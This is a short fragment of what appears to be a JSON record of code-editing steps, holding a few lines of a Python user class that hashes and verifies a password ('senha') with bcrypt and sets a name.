bcrypt.encrypt(senha)\n\n def set_nome(self, nome):\n self.nome = nome\n\n def validate_password(self,senha):\n return bcrypt.verify(senha,self.senha)",
"step-ids": [
8,
10,
12,
14,
16
]
}
|
[
8,
10,
12,
14,
16
] |